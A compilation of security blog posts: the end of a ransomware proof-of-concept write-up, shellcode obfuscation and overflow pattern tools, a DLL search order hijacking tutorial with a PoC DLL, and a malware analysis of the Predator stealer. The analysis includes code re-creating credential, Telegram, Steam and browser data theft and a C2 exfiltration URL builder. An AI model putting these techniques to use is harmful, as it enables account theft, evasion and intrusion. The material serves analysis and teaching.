To follow that up, we enter a do-while loop, which continues while we have more directories or files to encrypt in our current directory. We initialize two more directory path variables: the tmp2 variable stores the name of the next file/directory we need to traverse/encrypt, and the tmp3 variable stores the randomized encrypted file name after the file has been encrypted. Next, we check if the object we obtained a handle to is a directory and if it is the current or previous directory, '.' or '..'. If it is, we skip it.

If it’s any other directory, we append the name of that directory to the current directory, add it as a node to our linked list, and continue. If it’s a file, we generate a random string, append that string to the current directory path, and call encryptFile(). This function takes the following parameters: the full path to the unencrypted file, the full path name of the encrypted file, and the password used to encrypt. We then call DeleteFile() on the unencrypted file. Finally, we obtain a handle to the next file in the folder.

To finish the function off, we recursively call encryptDirectory() until there are no more folders in the linked list of folders we identified. A simplified sketch of this traversal is shown below.
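
Here is a simplified C sketch of that traversal using FindFirstFileW()/FindNextFileW(); plain recursion replaces the linked list of directories from the original code, and encrypt_file() is a stand-in for the real encryption routine.

#include <windows.h>
#include <stdio.h>

/* Stand-in for the real encryption routine described in the write-up. */
static void encrypt_file(const wchar_t *path)
{
    wprintf(L"would encrypt: %ls\n", path);
}

/* Simplified sketch of the recursive walk over a directory tree. */
static void encrypt_directory(const wchar_t *dir)
{
    wchar_t pattern[MAX_PATH];
    swprintf_s(pattern, MAX_PATH, L"%ls\\*", dir);  /* "\\*" retrieves all entries */

    WIN32_FIND_DATAW fd;
    HANDLE hFind = FindFirstFileW(pattern, &fd);
    if (hFind == INVALID_HANDLE_VALUE)
        return;

    do {
        /* Skip the "." and ".." pseudo-directories. */
        if (wcscmp(fd.cFileName, L".") == 0 || wcscmp(fd.cFileName, L"..") == 0)
            continue;

        wchar_t full[MAX_PATH];
        swprintf_s(full, MAX_PATH, L"%ls\\%ls", dir, fd.cFileName);

        if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            encrypt_directory(full);   /* recurse into subfolders */
        else
            encrypt_file(full);        /* encrypt (and, in the PoC, delete) the original */
    } while (FindNextFileW(hFind, &fd));

    FindClose(hFind);
}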

I won't dive too deep into the file encryption function for two reasons. First, I am not a big cryptography guy; I don't know much about it, and I don't want to give any false information. Second, I took this proof of concept and just implemented it in C instead of C++.

However, the important part I'd like to highlight is that I used the same determination scheme the Bleeding Bear campaign uses to ascertain whether a file should be corrupted or not. BreadBear and Bleeding Bear both use the file extension list shown in the Stage 2 section above to determine if a file should be altered.

Conclusion

With BreadBear, I took an analysis of a real threat actor's TTPs and created a working proof of concept, which I believe improves upon some of their tooling. This work can help organizations visualize how easily such a campaign can be created, and defend accordingly. More importantly, it was an educational exercise. Feel free to contribute to the code base over on GitHub.

The post Repurposing Real TTPs for use on Red Team Engagements appeared first on Nettitude Labs.

Obfuscated String/Shellcode Generator - Online Tool

Shellcode will be cleaned of non-hex bytes using the following algorithm:

s = s.replace(/(0x|0X)/g, "");
s = s.replace(/[^A-Fa-f0-9]/g, "");

See also: Overflow Exploit Pattern Generator - Online Tool.

About this tool

I'm preparing a malware reverse engineering class and building some crackmes for the CTF. I needed to encrypt/obfuscate flags so that they don't just show up with a strings tool. Sure you can crib the assembly and rig this out pretty easily, but the point of these challenges is to instead solve them through behavioral analysis rather than initial assessment. I'm sure this tool will also be good for getting some dirty strings past AV.

Sadly, I'm still not satisfied with the state of C++17 template magic for compile-time string obfuscation, or I wouldn't have had to make this. I remember a website that used to do something similar for free, but at some point it moved to a pay model. I think maybe it had a few extra features?

This instruments pretty nicely though in that an ADD won't be immediately followed by a SUB, which is basically a NOP. Same with XOR, SHIFT, etc. It can also MORPH the output even more by using the current string iteration in the arithmetic to add entropy.
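
To give an idea of what such output can look like, here is a hand-written C example in the same spirit (not actual output of the tool): the string "secret" is stored as transformed bytes and recovered at runtime with a per-index subtraction followed by an XOR, so a plain strings run won't reveal it.

#include <stdio.h>

int main(void)
{
    /* "secret" encoded as enc[i] = ((plain[i] ^ 0x5A) + i) & 0xFF */
    unsigned char enc[] = { 0x29, 0x40, 0x3B, 0x2B, 0x43, 0x33 };
    char out[sizeof(enc) + 1];

    for (size_t i = 0; i < sizeof(enc); i++)
        out[i] = (char)(((enc[i] - i) & 0xFF) ^ 0x5A);  /* undo ADD(i), then XOR 0x5A */
    out[sizeof(enc)] = '\0';

    printf("%s\n", out);  /* prints: secret */
    return 0;
}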

Only ASCII/ANSI is supported because if there's one thing I dislike more than JavaScript it's working with UCS2-LE encodings. And the only language it generates is raw C/C++ because those are the languages you would most likely need something like this for. Post a comment if there's a bug, and feel free to rip the code out if you want to.

Overflow Exploit Pattern Generator - Online Tool

Metasploit's pattern generator is a great tool, but Ruby's startup time is abysmally slow. Out of frustration, I made this in-browser online pattern generator written in JavaScript.

For the unfamiliar, this tool will generate a non-repeating pattern. You drop it into your exploit proof of concept, crash the program, and see what the value of your instruction pointer register is. You then type that value in to find the offset, i.e. how far your buffer needs to be overflowed before you hijack execution.
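
For illustration, here is a minimal C sketch of the classic Aa0Aa1Aa2… cyclic pattern that Metasploit-style generators produce; the online tool's exact algorithm may differ.

#include <stdio.h>

/* Emit a cyclic pattern of unique upper/lower/digit triplets. Any 4-byte
 * value read out of a crashed register maps back to a single offset. */
static void generate_pattern(size_t length)
{
    size_t written = 0;
    for (char u = 'A'; u <= 'Z' && written < length; u++)
        for (char l = 'a'; l <= 'z' && written < length; l++)
            for (char d = '0'; d <= '9' && written < length; d++) {
                char triplet[3] = { u, l, d };
                for (int i = 0; i < 3 && written < length; i++, written++)
                    putchar(triplet[i]);
            }
    putchar('\n');
}

int main(void)
{
    generate_pattern(200);  /* e.g. a 200-byte pattern for the PoC buffer */
    return 0;
}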

See also: Obfuscated String/Shellcode Generator - Online Tool

Top Security QuickFails: #5 Attack of the KlonAdmins aka Missing LAPS

#5 Attack of the KlonAdmins aka Missing LAPS. The attack: At FaulerHund AG in Munich, the employees are starting a new fiscal year and looking forward to new challenges. So is the administrator Karl KannNixDafür, who on Thursday at around 12:30 noticed that the account of Ute Unbeschwert was still logged in, even though she, at around 11 […]

The DLL Search Order And Hijacking It

If you ever used Process Monitor to track activity of a process, you might have encountered the following pattern:

Figure 1: Example of dnsapi.dll not being found in the application directory

The image above is a snippet of events captured by Process Monitor during the execution of x32dbg.exe on Windows 7. DNSAPI.DLL and IPHLPAPI.DLL reside in the System directory, so you might ask yourself:

Why would Windows try to search for either of these DLLs in the application directory first?

Operating Systems are very complex and so is the challenge of implementing an error-fault system to search for dependencies, like dynamic linked libraries. Today, we’ll talk about DLL Search Order and DLL Search Order Hijacking, in particular how it works and how adversaries can abuse it.

DLL Search Order

First, we have to talk about what happens when a PE File is executed on the Windows system.

The majority of native binaries you encounter on Windows are linked dynamically. Dynamically linked means that, upon execution, the binary uses information embedded inside it to locate the DLLs that are essential for the process. In contrast to statically linked binaries, a dynamically linked executable uses the libraries provided by the OS instead of having them compiled into the executable itself.

Before the dynamically linked executable can use or load these libraries, it will have to know where these dependencies are persisted on disk or if they are already in memory. This is where the DLL Search Order makes its appearance. To keep it simple, we will focus only on Windows Desktop Applications.

Pre-Checks and In-Memory Search

Before the Windows OS starts searching for the needed DLL on disk, it will first attempt to find the needed module in memory. If a DLL is already in memory, it will not be loaded again. This part is a little bit complicated and out of scope for this blog article, since we would have to define what "loaded" even means. If you are more interested in this first check, I advise you to look up the official Microsoft documentation[1].

If the memory check fails, Windows can fall back to using a list of known DLLs. If the needed library is part of that list, it will use the copy of the known DLL. The list of known DLLs is stored in the Windows Registry.

Figure 2: List of KnownDlls on Windows 7

On-Disk Search

If the first two checks fail, the OS will have to search for the DLL on disk. Depending on the OS settings, Windows will use a different search order. By default, Windows enables the Safe DLL Search Mode feature to harden the system against DLL Search Order Hijacking attacks, a technique we will explain in the upcoming section.

The registry value controlling the feature is as follows (a quick programmatic check is sketched after it):

  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode
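
For reference, a small C sketch that reads this value with RegGetValueA(); on current Windows versions, an absent value means the safe search mode default is in effect.

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "advapi32.lib")

int main(void)
{
    DWORD value = 0, size = sizeof(value);
    LSTATUS rc = RegGetValueA(HKEY_LOCAL_MACHINE,
                              "System\\CurrentControlSet\\Control\\Session Manager",
                              "SafeDllSearchMode",
                              RRF_RT_REG_DWORD, NULL, &value, &size);

    if (rc == ERROR_SUCCESS)
        printf("SafeDllSearchMode = %lu\n", value);
    else if (rc == ERROR_FILE_NOT_FOUND)
        printf("SafeDllSearchMode not set (defaults to enabled)\n");
    else
        printf("query failed: %ld\n", rc);
    return 0;
}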

Let’s take a look at the differences of the search order depending whether SafeDllSearchMode is enabled or not.

Figure 3: DLL Search Order flow

We clearly see that the current directory is prioritised if SafeDllSearchMode is disabled and this can be abused by adversaries. The art of abusing this search order flow is called DLL Search Order Hijacking.

DLL Search Order Hijacking

Adversaries can abuse the search order flow displayed above to load their own malicious DLLs into memory instead of the legitimate ones. There are many ways this technique can be used; however, it is more effective for achieving persistence on the target system than for initial execution.

Let’s take a step back and revisit our example from above:

  • x32dbg.exe tries to load DNSAPI.DLL
  • DNSAPI.DLL is not in the list of known DLLs and is also not loaded into memory.
  • Since SafeDllSearchMode is enabled, it will fall back to the system directory if the DLL is not found in the application directory.

What would happen, if we craft and place a malicious DLL, named DNSAPI.DLL into the application directory?

We would be able to hijack the search order flow and force a legitimate application to load our malicious code into memory.

Practical Use Case

Let's take a look at a simple practical example. Our application calls LoadLibraryA and tries to load dnsapi.dll, as in our example from above. Next, we craft a small DLL file which does nothing but create a message box in its DllMain function. Once the DLL is loaded into memory, DllMain is triggered, as sketched below.
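
A minimal sketch of such a proof-of-concept DLL could look like the following; built as dnsapi.dll (for example with cl /LD hijack.c user32.lib /Fe:dnsapi.dll) and dropped into the application directory, its DllMain fires as soon as the hijacked library is loaded.

#include <windows.h>

#pragma comment(lib, "user32.lib")

/* Proof-of-concept hijack DLL: pops a message box when loaded. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    (void)hinstDLL;
    (void)lpReserved;

    if (fdwReason == DLL_PROCESS_ATTACH)
        MessageBoxA(NULL, "DLL search order hijacked!", "PoC", MB_OK);

    return TRUE;
}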

In the first run, we do not place the crafted DLL in the application directory. As expected, Windows loads dnsapi.dll from the system directory.

Next, we name our crafted DLL dnsapi.dll and place it in the application directory.

Whoops! I think we can all think of a couple use cases of how APT groups and malware can abuse this technique to achieve persistence on the victim’s system.

Real world examples and APTs

For the sake of keeping it simple and explaining the core principles behind this persistence technique, we've built a very simple use case here. Of course, the real world looks a little different, and attackers usually have to take into account:

  • Endpoint Security solutions with behaviour based detections, preventing such attacks with signatures
  • Programmatic dependencies, which won’t allow you to just replace a DLL in an application directory and hope that it will work just fine
  • and many more

However, if you never heard about this technique, I hope I was able to create some awareness for it!

Predator The Thief: In-depth analysis (v2.3.5)

By: fumko

Well, it's been a long time without fresh new content on my blog. I had some unexpected problems that kept me away from here, and a lot of work (like my tracker), which explains this. But it's time to come back (slowly) with some stuff.

So today, this is an in-depth analysis of one stealer: "Predator the thief", written in C/C++. Like dozens of other malware families, it's ready-to-sell malware delivered as a builder & C2 panel package.

The goal is to explain step by step how this malware works, with a lot of extra explanation for some parts. This post is mainly addressed to junior reverse engineers or malware analysts who want to understand and defeat some of these techniques/tricks easily.

So here we go!

Classical life cycle

The execution order is almost the same for most stealers nowadays. Changes mostly vary in the evasion techniques and in how they interact with the C2. For example, with Predator, the setup is quite simple but could vary if the attacker sets up a loader on his C2.

The life cycle of Predator the thief

Preparing the field

Before stealing sensitive data, Predator starts by setting up some basic stuff to be able to work correctly. Almost all the configuration is loaded into memory step by step.

EntryPoint

So let’s put a breakpoint at “0x00472866” and inspect the code…

Call_Setup

  1. EBX is set to the length of our loop (in our case, it will be 0x0F)
  2. ESI holds the addresses of all the configuration functions
  3. EAX grabs one address from ESI and moves it into EBP-8
  4. EBP is called, so at this point a config function unpacks some data and saves it onto the stack
  5. The ESI position is then advanced by 4
  6. EDI is incremented until it reaches the value stored in EBX
  7. When EDI == EBX, all required configuration values are stored on the stack and the main part of the malware can start

So, for example, let's see what we have inside 0x0040101D at 0x00488278.

So with x32dbg, let’s see what we have… with a simple command

Command: go 0x0040101D

As you can see, this is where the C2 is stored, decoded and saved onto the stack.

C2

So what values are stored with this technique?

  • C2 Domain
  • %APPDATA% Folder
  • Predator Folder
  • the temporary name and location of the Predator archive file
  • the name of the archive when it is sent to the C2
  • etc…

With the help of the %APPDATA%/Roaming path, the Predator folder is created (\ptst). Something notable is that this name is hardcoded behind an XORed string and not generated randomly. By pure speculation, it could be a shortcut for "Predator The STealer".

The same observation applies to the name of the temporary archive file used during the stealing process: "zpar.zip".

The welcome message…

When you are positioned at the main module of the stealer, a lovely message, looped 0x06400000 times, is addressed to people who want to reverse it.

welcome

Obfuscation Techniques

The thief who loves XOR (a little bit too much…)

Almost all the strings in this stealer sample are XORed, even though this obfuscation technique is really easy to understand and one of the easiest to decrypt. Here, it is used in multiple forms just to slow down the analysis; an illustrative decryption routine is sketched below.
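
As an illustration only, a typical single-byte XOR string decryption routine of this kind could look like the sketch below; the key and encrypted bytes are made-up example values, not taken from the sample.

#include <stdio.h>

/* Decrypt a buffer in place with a single-byte XOR key. */
static void xor_decrypt(unsigned char *buf, size_t len, unsigned char key)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}

int main(void)
{
    /* "\ptst" XORed with 0x41 -- hypothetical example values */
    unsigned char folder[] = { 0x1D, 0x31, 0x35, 0x32, 0x35 };
    xor_decrypt(folder, sizeof(folder), 0x41);
    printf("%.*s\n", (int)sizeof(folder), (char *)folder);  /* prints \ptst */
    return 0;
}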

GetProcAddress Alternatives

To avoid calling functions from different libraries directly, it uses a classic trick: it resolves a specific API step by step and stores its address in a register. This hides the direct call to the function behind a simple register call.

First, a XORed string (a DLL name) is decrypted. In this case, kernel32.dll is required for the specific function that the malware wants to call.

Step_1_API

When the decryption is done, this library is loaded with the help of “LoadLibraryA“. Then, a cleartext string is pushed into EDX: “CreateDirectoryA“… This is the function the stealer wants to use.

The only thing it needs now is to retrieve the address of the exported function “CreateDirectoryA” from kernel32.dll. Usually, this is done with the help of GetProcAddress, but that function is in fact not called here and another trick is used to get the right value.

Step_2_API

So this string and the IMAGE_DOS_HEADER of kernel32.dll are sent into “func_GetProcesAddress_0”. The idea is to manually retrieve the pointer to the function address we want with the help of the Export Table. So let’s see what we have in it…

struct IMAGE_EXPORT_DIRECTORY {
	long Characteristics;
	long TimeDateStamp;
	short MajorVersion;
	short MinorVersion;
	long Name;
	long Base;
	long NumberOfFunctions;
	long NumberOfNames;
	long *AddressOfFunctions;    <= This good boy
	long *AddressOfNames;        <= This good boy 
	long *AddressOfNameOrdinals; <= This good boy
}

After inspecting the IMAGE_EXPORT_DIRECTORY structure, three fields are mandatory:

  • AddressOfFunctions – an array that contains the relative virtual addresses (RVAs) of the module’s functions.
  • AddressOfNames – an array that stores the names of all the module’s exported functions, in ascending order.
  • AddressOfNameOrdinals – a 16-bit array that contains the ordinals associated with the function names in AddressOfNames.

source

So after saving the absolute positions of these 3 arrays, the loop is simple:

Function_Get

  1. Grab the RVA of one function
  2. Get the name of this function
  3. Compare the string with the desired one.

So let’s look at the details to understand everything:

If we dig into ds:[eax+edx*4], this is where all the relative virtual addresses of the kernel32.dll exported functions are stored.

RVA
The next instruction, add eax, ecx, moves to the exact position of the string value in the “AddressOfNames” array.

DLLBaseAddress + AddressOfNameRVA[i] = Function Name 
   751F0000    +       0C41D4        = CreateDirectoryA

Address of names

The comparison matches; now it needs to store the “ProcAddress”. First, the ordinal number of the function is saved. Then, with the help of this value, the function address position is grabbed and saved into ESI.

ADD           ESI, ECX
ProcAddress = Function Address + DLLBaseAddress

In disassembly, it looks like this :

GetProcAddress
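For readers who prefer source over disassembly, the same walk can be reproduced with pefile. This is my own sketch of the technique (not the malware’s code), assuming pefile’s get_dword_at_rva / get_word_at_rva / get_string_at_rva helpers and an example image base taken from the screenshot above:

import pefile

def manual_get_proc_address(dll_path: str, func_name: bytes, image_base: int) -> int:
    # Walk the export directory by hand, mirroring func_GetProcesAddress_0:
    # find the name in AddressOfNames, read the matching ordinal, then use it
    # to index AddressOfFunctions and add the module base.
    pe = pefile.PE(dll_path)
    ed = pe.DIRECTORY_ENTRY_EXPORT.struct
    for i in range(ed.NumberOfNames):
        name_rva = pe.get_dword_at_rva(ed.AddressOfNames + 4 * i)    # ds:[eax+edx*4]
        if pe.get_string_at_rva(name_rva) == func_name:              # string comparison loop
            ordinal = pe.get_word_at_rva(ed.AddressOfNameOrdinals + 2 * i)
            func_rva = pe.get_dword_at_rva(ed.AddressOfFunctions + 4 * ordinal)
            return image_base + func_rva                             # ProcAddress
    return 0

# e.g. manual_get_proc_address(r"C:\Windows\SysWOW64\kernel32.dll",
#                              b"CreateDirectoryA", 0x751F0000)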

Let’s inspect the code at the specific procAddress…

Check_01

Step_END_API

Everything is done: the address of the function is now stored in EAX and it only needs to be called.

Anti-VM Technique

A simple anti-VM technique is used here to check whether the stealer is launched inside a virtual machine. This is also the only anti-detection trick used by Predator.

Anti_VM_01

First, User32.dll (XORed) is dynamically loaded with the help of “LoadLibraryA“, then the “EnumDisplayDevicesA” function is resolved from User32.dll. The idea here is to get the “Device Description” value of the display currently in use.

When that is done, the result is checked against some values (obviously XORed too):

  • Hyper-V
  • VMware
  • VirtualBox

regedit_hyperv

If the string matches, you are redirected to a function renamed here as “func_VmDetectedGoodBye”.
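The same check can be reproduced on an analysis VM to see what the stealer would see. This is a Windows-only ctypes sketch of the EnumDisplayDevicesA call (my own illustration, not the malware’s code):

import ctypes
from ctypes import wintypes

class DISPLAY_DEVICEA(ctypes.Structure):
    _fields_ = [
        ("cb", wintypes.DWORD),
        ("DeviceName", ctypes.c_char * 32),
        ("DeviceString", ctypes.c_char * 128),   # the "Device Description" Predator checks
        ("StateFlags", wintypes.DWORD),
        ("DeviceID", ctypes.c_char * 128),
        ("DeviceKey", ctypes.c_char * 128),
    ]

def display_device_strings():
    user32 = ctypes.windll.user32
    dev = DISPLAY_DEVICEA()
    dev.cb = ctypes.sizeof(dev)
    i, results = 0, []
    while user32.EnumDisplayDevicesA(None, i, ctypes.byref(dev), 0):
        results.append(dev.DeviceString.decode(errors="replace"))
        i += 1
    return results

if __name__ == "__main__":
    markers = ("Hyper-V", "VMware", "VirtualBox")
    for desc in display_device_strings():
        hit = any(m.lower() in desc.lower() for m in markers)
        print(desc, "-> would be flagged" if hit else "-> ok")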

How to bypass this Anti-VM technique?

To defeat this simple trick, the goal is to modify the REG_SZ value of “DriverDesc” under the {4d36e968-e325-11ce-bfc1-08002be10318} class key to something else.

regedit_bypass

And voilà!

Troll

Stealing Part

Let’s talk about the main subject: how this stealer is organized. As far as I could tell from disassembling the code, these are all the folders that the malware creates in the “ptst” directory before sending it as an archive to the C2.

  • Folder
    • Files: Contains classic text/document files from specific paths
    • FileZilla: Grabs one or two files from this FTP client
    • WinFTP: Grabs one file from this FTP client
    • Cookies: Stolen cookies saved from different browsers
    • General: Generic data
    • Steam: Stolen login account data
    • Discord: Stolen login account data
  • Files
    • Information.log
    • Screenshot.jpeg <= Screenshot of the current screen

Telegram

To check whether Telegram is installed on the machine, the malware checks whether the key path “Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1” exists.

So let’s inspect what we have inside this key path. After digging into the code, the stealer requests the value of “InstallLocation”, because this is where Telegram is currently installed on the machine.

Install

Step by step, the path is recreated (as always, all the strings are XORed):

  • %TELEGRAM_PATH%
  • \Telegram Desktop
  • \tdata
  • \D877F783D5D3EF8C

map file

The folder “D877F783D5D3EF8C” is where all the Telegram cache is stored. This is the sensitive data that the stealer wants to grab. During the process, the map* file (e.g. map1) is also checked; this file is, in fact, the encryption key. So if someone grabs everything from this folder, the attacker can gain access (login without prompt) to the victim’s account.
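The same lookup can be reproduced on a test machine. This is a hedged, Windows-only winreg sketch (hypothetical helper, not the malware’s code; which registry hive holds the key and whether InstallLocation already ends in \Telegram Desktop are my assumptions):

import winreg

UNINSTALL_KEY = (r"Software\Microsoft\Windows\CurrentVersion\Uninstall"
                 r"\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1")

def telegram_tdata_path():
    """Return the tdata cache path the stealer rebuilds, or None if Telegram is absent."""
    for hive in (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE):
        try:
            with winreg.OpenKey(hive, UNINSTALL_KEY) as key:
                install_location, _ = winreg.QueryValueEx(key, "InstallLocation")
                # The post lists "\Telegram Desktop" as an intermediate segment; on a
                # typical install, InstallLocation already ends with it (assumption).
                return install_location.rstrip("\\") + r"\tdata\D877F783D5D3EF8C"
        except OSError:
            continue
    return None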

Steam

The technique the stealer uses to get information for one piece of software remains the same for the following targets (in most cases). This greatly facilitates the understanding of this malware.

First, it checks the “SteamPath” key value at “HKCU\Software\Valve\Steam” to grab the correct Steam directory. This value is then concatenated with a list of files that are necessary to compromise a Steam account.

It first checks whether ssfn files are present on the machine with the help of “func_FindFiles”; if they are, they are duplicated into the temporary malware folder stored under %APPDATA%/XXXX. Then it does the same thing with config.vdf.

XOR_3

So what is the point of these files? After some research, I found an interesting post on Reddit: it explained that ssfn files make it possible to bypass SteamGuard during user log-on.

Steam

Now, what is the point of the second file? This is where you can learn some information about the user account and all the applications installed on the machine. Also, if the ConnectCache field is found in this file, it is possible to log into the stolen account without the Steam authentication prompt. If you are curious, this pattern is represented like this:

"ConnectCache"
{
       "STEAM_USERNAME_IN_CRC32_FORMAT" "SOME_HEX_STUFF"
}

The last file that the stealer wants to grab is “loginusers.vdf”. This one can be used for multiple purposes, but mainly for manually setting the account to offline mode.
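For defenders who want to check what would be exposed on their own machine, a small Windows-only sketch can list the same artifacts. This is my own hypothetical helper, starting from the SteamPath registry value named above (the config subfolder for the .vdf files is my assumption; the post only names the files):

import glob
import os
import winreg

def steam_artifacts():
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Valve\Steam") as key:
        steam_path, _ = winreg.QueryValueEx(key, "SteamPath")
    # ssfn* files sit directly in the Steam directory.
    targets = glob.glob(os.path.join(steam_path, "ssfn*"))
    for name in ("config.vdf", "loginusers.vdf"):
        candidate = os.path.join(steam_path, "config", name)
        if os.path.isfile(candidate):
            targets.append(candidate)
    return targets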

XOR_4

For more details on the subject, there is a nice report by Kaspersky:

Wallets

The stealer is supporting multiple digital wallets such as :

  • Ethereum
  • Multibit
  • Electrum
  • Armory
  • Bytecoin
  • Bitcoin
  • Etc…

The functionality is rudimentary, but it’s enough to grab specific files such as:

  • *.wallet
  • *.dat

And as usual, all the strings are XORed.

Wallet

FTP software

The stealer supports two FTP software :

  • Filezilla
  • WinFTP

It’s really rudimentary: it only searches for three files, and if they are available, a simple copy into the Predator folder is done:

  • %APPDATA%\Filezilla\sitemanager.xml
  • %APPDATA%\Filezilla\recentservers.xml
  • %PROGRAMFILES%\WinFtp Client\Favorites.dat

Browsers

It’s not necessary to go into deep detail about which browser files the stealer focuses on. There are currently a dozen articles that explain how this kind of malware manages to steal web data. I recommend reading the well-detailed overview article by @coldshell.

As usual, popular Chrome-based & Firefox-based browsers and also Opera are mainly targeted by Predator.

This is the current official list supported by this stealer :

  • Amigo
  • BlackHawk
  • Chromium
  • Comodo Dragon
  • Cyberfox
  • Epic Privacy Browser
  • Google Chrome
  • IceCat
  • K-Meleon
  • Kometa
  • Maxthon5
  • Mozilla Firefox
  • Nichrome
  • Opera
  • Orbitum
  • Pale Moon
  • Sputnik
  • Torch
  • Vivaldi
  • Waterfox
  • Etc…

This stealer also uses SQLite to extract data from browsers and saves it into a temporary file named “vlmi{lulz}yg.col”.

sqlite

So the task is simple (a minimal sketch of this flow follows the list):

  • Steal the browser SQLite file
  • Extract data with the help of SQLite and put it into a temporary file
  • Then read it and save it into a text file with a specific name (for each browser).
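This is my own illustrative version of the same flow, not the stealer’s code: copy the (possibly locked) browser database aside, then query it with SQLite. The “logins” table and its column names are Chrome’s; other browsers differ slightly.

import shutil
import sqlite3
import tempfile

def dump_chrome_logins(login_data_path: str):
    # Work on a copy, like the temporary .col file mentioned above.
    tmp = tempfile.mktemp(suffix=".col")
    shutil.copy2(login_data_path, tmp)
    with sqlite3.connect(tmp) as con:
        rows = con.execute(
            "SELECT origin_url, username_value FROM logins").fetchall()
    return rows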

cookies

When form data or credentials are found, they’re saved into dedicated files in the General folder:

  • forms.log
  • password.log
  • cards.log

General

Discord

If Discord is detected on the machine, the stealer will search for and copy the “https_discordapp_*localstorage” file into the “ptst” folder. This file contains all the sensitive information about the account and can permit authentication without a login prompt if it is dropped into the correct directory on the attacker’s machine.
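As a hedged illustration of where that file would typically be found: the post only names the file pattern, and the %APPDATA%\discord\Local Storage location below is my assumption.

import glob
import os

pattern = os.path.join(os.environ.get("APPDATA", ""), "discord",
                       "Local Storage", "https_discordapp_*localstorage")
print(glob.glob(pattern))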

Discord_Part1Discord_Part2Discord_Part3

Predator is inspecting multiple places…

This stealer steals data from 3 strategic folders:

  • Desktop
  • Downloads
  • Documents

Each time, the task is the same: it searches for 4 types of files with the help of GetFileAttributesA:

  • *.doc
  • *.docx
  • *.txt
  • *.log

When a file matches, it is copied into a folder named “Files” (the sketch below re-creates the same search).
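A rough re-creation of the document grab, for illustration only (the stealer walks the folders with GetFileAttributesA rather than Python’s glob):

import glob
import os

FOLDERS = ("Desktop", "Downloads", "Documents")
PATTERNS = ("*.doc", "*.docx", "*.txt", "*.log")

def grabbed_files(profile: str = os.path.expanduser("~")):
    hits = []
    for folder in FOLDERS:
        for pattern in PATTERNS:
            hits.extend(glob.glob(os.path.join(profile, folder, pattern)))
    return hits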

Information.log

When these tasks are done, the malware generates a summary file, “Information.log”, which contains specific and sensitive data about the victim machine. For DFIR, this file is the artifact that identifies the malware, because it contains its name and specific version.

So first, it writes the username of the user who executed the payload, the computer name, and the OS version.

User name: lolilol
Machine name: Computer 
OS version: Windoge 10

Then it copies the content of the clipboard with the help of GetClipboardData:

Current clipboard: 
-------------- 
Omelette du fromage

Let’s continue the process…

Startup folder: C:\Users\lolilol\AppData\Local\Temp\predator.exe

Some classic specifications about the machine are requested and saved into the file.

CPU info: Some bad CPU | Amount of kernels: 128 (Current CPU usage: 46.112917%) 
GPU info: Fumik0_ graphical display 
Amount of RAM: 12 GB (Current RAM usage: 240 MB) 
Screen resolution: 1900x1005

Then, all the user accounts are listed:

Computer users: 
lolilol 
Administrator 
All Users 
Default 
Default User 
Public

The last part is about some exotic information that is, in fact, quite awkward… Firstly, for reasons I don’t want to understand, the compile time is hardcoded in the payload.

Compile Time

The second exotic piece of data saved into Information.log is the execution time taken to grab content from the machine… This information could be useful for debugging tweaks to the features.

Additional information:
Compile time: Aug 31 2018
Grabbing time: 0.359375 second(s)

C2 Communications

To finish Information.log, a GET request is made to retrieve some network data about the victim…

First, it sets up the request by decoding some data such as:

  • A user-agent
  • The content-type

UA

  • The API URL ( /api/info.get )

We can get, for example, this result:

Amsterdam;Netherlands;52.3702;4.89517;51.15.43.205;Europe/Amsterdam;1012;

When the request is done, the data is consolidated step by step with the help of different loops and conditions.

GET01

When the task is done, the results are saved into Information.log:

City: Nopeland 
Country:  NopeCountry
Coordinates: XX.XXXX N, X.XXXX W 
IP: XXX.XXX.XXX.XXX 
Timezone: Nowhere 
Zip code: XXXXX
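The consolidation step essentially splits the semicolon-separated response into the fields above. A minimal sketch (my own, with the field order inferred from the example “Amsterdam;Netherlands;…” response; the real code does this with its own loops and conditions):

def parse_info_get(response: str) -> dict:
    city, country, lat, lon, ip, timezone, zip_code = response.rstrip(";").split(";")
    return {
        "City": city,
        "Country": country,
        "Coordinates": f"{lat} N, {lon} W",   # hemisphere suffixes as shown in the log above
        "IP": ip,
        "Timezone": timezone,
        "Zip code": zip_code,
    }

print(parse_info_get("Amsterdam;Netherlands;52.3702;4.89517;51.15.43.205;Europe/Amsterdam;1012;"))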

The archive is now complete; the stealer only needs to send it to the C2.

zpar.zip

So now it puts some pieces of information into the gate.get request via specific arguments, from p1 to p7, for example:

  • p1: Number of accounts stolen
  • p2: Number of cookies stolen
  • p4: Number of forms stolen
  • etc…

results :

Request

The POST request is now complete; the stealer will clean everything up and quit.
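For reference, the query-string shape of that exfiltration request can be reproduced in a few lines. This is a hedged sketch only: the counter values are placeholders, the meaning of parameters beyond p1/p2/p4 is not documented above, and the archive itself is presumably carried in the POST body.

from urllib.parse import urlencode

def build_gate_url(c2: str, counters: dict) -> str:
    # counters maps p1..p7 to integers, e.g. {"p1": accounts, "p2": cookies, ...}
    return f"http://{c2}/api/gate.get?" + urlencode(counters)

print(build_gate_url("c2.example", {f"p{i}": 0 for i in range(1, 8)}))
# http://c2.example/api/gate.get?p1=0&p2=0&...&p7=0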

Panel_C2_Example

Example of Predator C2 Panel with fancy background…

Update – v2.3.7

During the analysis, new versions were pushed… Currently (at the time this post was written), v3 has been released, but since I don’t have that specific version, I won’t say anything about it and will focus only on 2.3.7.

It’s pointless to review it from scratch: the mechanics of this stealer are still the same, only some tweaks and other rearrangements were made for various purposes… Without digging too much into it, let’s look at some changes (not all) that I found interesting.

changelog

Changelog of v2.3.7 explained by the author

As usual, these are the same patterns:

  • Code optimizations (Faster / Lightweight)
  • More features…

As you can see v2.3.7 on the right is much longer than v2.3.5 (left), but the backbone is still the same.

Mutex

In 2.3.7, a mutex is integrated, with the specific string “SyystemServs”.

Xor / Obfuscated Strings

XOR_v2

During the C2 requests, URL arguments are generated byte by byte and un-XORed.

For example :

push 04
...
push 61
...
push 70
...
leads to this 
HEX    : 046170692F676174652E6765743F70313D
STRING : .api/gate.get?p1=

